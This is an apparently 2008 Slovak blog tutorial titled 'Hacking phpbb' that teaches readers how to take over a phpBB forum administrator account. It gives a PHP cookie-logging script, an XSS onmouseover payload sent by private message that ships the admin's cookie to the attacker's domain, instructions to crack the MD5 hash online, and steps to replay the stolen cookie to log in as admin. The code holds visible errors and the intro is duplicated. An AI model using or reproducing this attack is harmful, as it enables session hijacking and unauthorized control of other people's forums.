- Ako urobiť z linkov v code živé linky (pre Firefox a Operu)
- Volanie zadarmo cez zlatestranky.sk
- Zoznam freehostingov so subdomenami
- Vytvorenie CS 1.6 servera zdarma
- Free SMS cez internet
- Spider-Man: Web of Shadows
- Európski poslanci chcú chrániť deti pred zneužitím na internete
- Facebook hostuje až desať miliárd fotografií
- V USA majú nový anti-pirátsky zákon
- Apple odhalí nové MacBooky 14. októbra
Hacking phpbb
Vítam vás v tomto článku. Dnes som sa rozhodol napísať niečo na temu hacking dlho som rozmýšlal čo napíšem. Akurat som stahol jeden film ked ma napadlo že napíšem niečo o hackingu phpbb rozmýšlal som ako nato ako by sa to dalo spraviť a napadla mi jedna veľmi jednoduchá možnosť. A to odchitenie adminovho cookie. Myslím že to nebude nič takže. Tak podme do toho. Čo k tomu budeme potrebovať ?Vítam vás v tomto článku. Dnes som sa rozhodol napísať niečo na temu hacking dlho som rozmýšlal čo napíšem. Akurat som stahol jeden film ked ma napadlo že napíšem niečo o hackingu phpbb rozmýšlal som ako nato ako by sa to dalo spraviť a napadla mi jedna veľmi jednoduchá možnosť. A to odchitenie adminovho cookie. Myslím že to nebude nič takže. Tak podme do toho. Čo k tomu budeme potrebovať ? 1) Firefox, možete si ho toto stiahnúť : http://www.download.com/3001-2356_4-10854845.html?hhTest=1 2) Live HTTP Headers pre firefox, môžete si ho stiahnúť na http://livehttpheaders.mozdev.org 3) Nejaký webový server napr. wz.cz alebo ic.cz. Toto je úplne na vás aký si zvolíte.
Tak a ideme do toho ako spravíme aby sme tomu adminovi odchitili cookie ? Je to veľmi jednoduché. Spravíte si jednoduché súbor, môže sa volať napr. cookie.php. Jeho kód bude vyzerať takto :
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('admin_cookie.txt 'a'); // Tomuto súboru nastavíme CHMOD na 777.
lol.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>
Myslím ,že to neni nejaký zložitý kód. Tak a teraz ked ten kód mám hotový čo mám robiť ďalej ?
1) Bude admina pozveťe na vašu stránku kde bude tento súbor alebo mu pošlete súkromnú spravu a do nej dáte niečo takéto : < pre a='>' onmouseover='document.location="http://tvojadomena.sk/cookie.php?c="+document.cookie' b=' Pcblog.sk
2) Ak nato tento odkaz admin príde myšov prehodí ho na ten odkaz a ukáže mu len bielu obrazovku...(To si môžete samozrejme zmeniť).
3) Do súboru lol.txt sa vám uloží niečo takéto :
Xforums_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";}; admin=cXVpeGplc3RlcjozOTIxYzc1YjI5OTI2OGJkODdmNDhl YzhjMjg5YzNmMDplbmdsaXNo; user=MzIwOnViZXJtYWdlOjljZGZiNDM5Yzc4NzZlNzAzZTMwN zg2NGM5MTY3YTE1OjEwOjowOjA6MDowOjo0MDk2; lang=english; eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"3921c75b299268bd87f48ec8c289c3f0\";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=8e01ff74cfe643a527bdeafc9293a991
4) Teraz bude najlepšie skopírovať hash MD5 (3921c75b299268bd87f48ec8c289c3f0), skopírovať to a isť nájsť nejaký cracker a vylepiť to tam. Môže byť napr. md5.rednoize.com. Ale to je na vás aký si zvolíte, ak sa ti nič neukáže budeš sa musieť použiť http headers na zalogovanie sa ako admin.
5) Teraz obnov stránku a na vrchu http headers uvidíš toto : Pcblog.sk
6) Klikni na obnovit(refresh)
Vymaž celý kod, ktorý prišiel potom cookie:
Vymeň za kód, ktorý sme dostali z bodu 3.
Zasa obnov stránku a si prihlásený ako admin! Ak to nepodje na prvýkrát, pohraj sa s headers, malo by sa to podariť.
Záver :
Ospravedlnuje sa všetkých adminom za tento článok....Ak by som niečo nešlo prosím do témy...Ďakujem za pozornosť....
God.Hell |
14. červenece 08, 10:07
Související články
- Phpbb [Open Source Redakčný systém] (14. červenece 08, 11:07)
- Hacking (2. srpna 08, 11:08)
- Google Hacking (14. červenece 08, 10:07)
- Hacking v skratke (25. červenece 08, 10:07)